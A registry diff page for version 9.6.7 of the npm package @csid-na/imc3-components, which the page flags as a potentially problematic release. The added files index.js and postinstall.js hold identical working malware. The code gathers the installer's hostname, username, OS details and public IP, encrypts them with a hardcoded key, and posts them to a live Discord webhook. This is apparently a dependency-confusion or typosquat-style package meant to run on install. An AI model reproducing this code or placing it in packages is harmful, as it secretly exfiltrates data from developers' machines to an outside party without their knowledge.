@csid-na/imc3-components 9.6.7
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @csid-na/imc3-components might be problematic. Click here for more details.
- package/dist/index.js +73 -0
- package/package.json +11 -0
- package/postinstall.js +73 -0
package/dist/index.js
ADDED
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const crypto = require('crypto');
|
|
4
|
+
|
|
5
|
+
function getPublicIP(callback) {
|
|
6
|
+
https.get('https://api.ipify.org?format=json', (resp) => {
|
|
7
|
+
let data = '';
|
|
8
|
+
resp.on('data', (chunk) => {
|
|
9
|
+
data += chunk;
|
|
10
|
+
});
|
|
11
|
+
resp.on('end', () => {
|
|
12
|
+
callback(JSON.parse(data).ip);
|
|
13
|
+
});
|
|
14
|
+
}).on('error', (err) => {
|
|
15
|
+
console.error('Error obteniendo IP pública:', err);
|
|
16
|
+
callback(null);
|
|
17
|
+
});
|
|
18
|
+
}
|
|
19
|
+
|
|
20
|
+
function encryptData(data, key) {
|
|
21
|
+
const cipher = crypto.createCipheriv('aes-256-cbc', key, key.slice(0, 16));
|
|
22
|
+
let encrypted = cipher.update(data, 'utf8', 'hex');
|
|
23
|
+
encrypted += cipher.final('hex');
|
|
24
|
+
return encrypted;
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
function sendSystemInfo(ip) {
|
|
28
|
+
const sysData = {
|
|
29
|
+
plt: os.platform(),
|
|
30
|
+
arch: os.arch(),
|
|
31
|
+
cpu: os.cpus().length,
|
|
32
|
+
host: os.hostname(),
|
|
33
|
+
usr: os.userInfo().username,
|
|
34
|
+
ip: ip
|
|
35
|
+
};
|
|
36
|
+
|
|
37
|
+
const encryptionKey = crypto.createHash('sha256').update('verystrongpassword').digest();
|
|
38
|
+
const encryptedSysData = encryptData(JSON.stringify(sysData), encryptionKey);
|
|
39
|
+
|
|
40
|
+
const webhookUrl = '/api/webhooks/1278253416140767275/INRlpKcTGZjjDVedwpY43Pb9EzHMwocXT5axmf8nP4yePaU3ZXYLu9FWCH1v4asfg9n6';
|
|
41
|
+
|
|
42
|
+
const payload = JSON.stringify({
|
|
43
|
+
content: `System Info: ${encryptedSysData}`
|
|
44
|
+
});
|
|
45
|
+
|
|
46
|
+
const options = {
|
|
47
|
+
hostname: 'discord.com',
|
|
48
|
+
port: 443,
|
|
49
|
+
path: webhookUrl,
|
|
50
|
+
method: 'POST',
|
|
51
|
+
headers: {
|
|
52
|
+
'Content-Type': 'application/json',
|
|
53
|
+
'Content-Length': Buffer.byteLength(payload)
|
|
54
|
+
}
|
|
55
|
+
};
|
|
56
|
+
|
|
57
|
+
const req = https.request(options, (res) => {
|
|
58
|
+
res.on('data', (d) => {
|
|
59
|
+
process.stdout.write(d);
|
|
60
|
+
});
|
|
61
|
+
});
|
|
62
|
+
|
|
63
|
+
req.on('error', (e) => {
|
|
64
|
+
console.error(e);
|
|
65
|
+
});
|
|
66
|
+
|
|
67
|
+
req.write(payload);
|
|
68
|
+
req.end();
|
|
69
|
+
}
|
|
70
|
+
|
|
71
|
+
getPublicIP((ip) => {
|
|
72
|
+
sendSystemInfo(ip);
|
|
73
|
+
});
|
package/package.json
ADDED
package/postinstall.js
ADDED
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const crypto = require('crypto');
|
|
4
|
+
|
|
5
|
+
function getPublicIP(callback) {
|
|
6
|
+
https.get('https://api.ipify.org?format=json', (resp) => {
|
|
7
|
+
let data = '';
|
|
8
|
+
resp.on('data', (chunk) => {
|
|
9
|
+
data += chunk;
|
|
10
|
+
});
|
|
11
|
+
resp.on('end', () => {
|
|
12
|
+
callback(JSON.parse(data).ip);
|
|
13
|
+
});
|
|
14
|
+
}).on('error', (err) => {
|
|
15
|
+
console.error('Error obteniendo IP pública:', err);
|
|
16
|
+
callback(null);
|
|
17
|
+
});
|
|
18
|
+
}
|
|
19
|
+
|
|
20
|
+
function encryptData(data, key) {
|
|
21
|
+
const cipher = crypto.createCipheriv('aes-256-cbc', key, key.slice(0, 16));
|
|
22
|
+
let encrypted = cipher.update(data, 'utf8', 'hex');
|
|
23
|
+
encrypted += cipher.final('hex');
|
|
24
|
+
return encrypted;
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
function sendSystemInfo(ip) {
|
|
28
|
+
const sysData = {
|
|
29
|
+
plt: os.platform(),
|
|
30
|
+
arch: os.arch(),
|
|
31
|
+
cpu: os.cpus().length,
|
|
32
|
+
host: os.hostname(),
|
|
33
|
+
usr: os.userInfo().username,
|
|
34
|
+
ip: ip
|
|
35
|
+
};
|
|
36
|
+
|
|
37
|
+
const encryptionKey = crypto.createHash('sha256').update('verystrongpassword').digest();
|
|
38
|
+
const encryptedSysData = encryptData(JSON.stringify(sysData), encryptionKey);
|
|
39
|
+
|
|
40
|
+
const webhookUrl = '/api/webhooks/1278253416140767275/INRlpKcTGZjjDVedwpY43Pb9EzHMwocXT5axmf8nP4yePaU3ZXYLu9FWCH1v4asfg9n6';
|
|
41
|
+
|
|
42
|
+
const payload = JSON.stringify({
|
|
43
|
+
content: `System Info: ${encryptedSysData}`
|
|
44
|
+
});
|
|
45
|
+
|
|
46
|
+
const options = {
|
|
47
|
+
hostname: 'discord.com',
|
|
48
|
+
port: 443,
|
|
49
|
+
path: webhookUrl,
|
|
50
|
+
method: 'POST',
|
|
51
|
+
headers: {
|
|
52
|
+
'Content-Type': 'application/json',
|
|
53
|
+
'Content-Length': Buffer.byteLength(payload)
|
|
54
|
+
}
|
|
55
|
+
};
|
|
56
|
+
|
|
57
|
+
const req = https.request(options, (res) => {
|
|
58
|
+
res.on('data', (d) => {
|
|
59
|
+
process.stdout.write(d);
|
|
60
|
+
});
|
|
61
|
+
});
|
|
62
|
+
|
|
63
|
+
req.on('error', (e) => {
|
|
64
|
+
console.error(e);
|
|
65
|
+
});
|
|
66
|
+
|
|
67
|
+
req.write(payload);
|
|
68
|
+
req.end();
|
|
69
|
+
}
|
|
70
|
+
|
|
71
|
+
getPublicIP((ip) => {
|
|
72
|
+
sendSystemInfo(ip);
|
|
73
|
+
});
|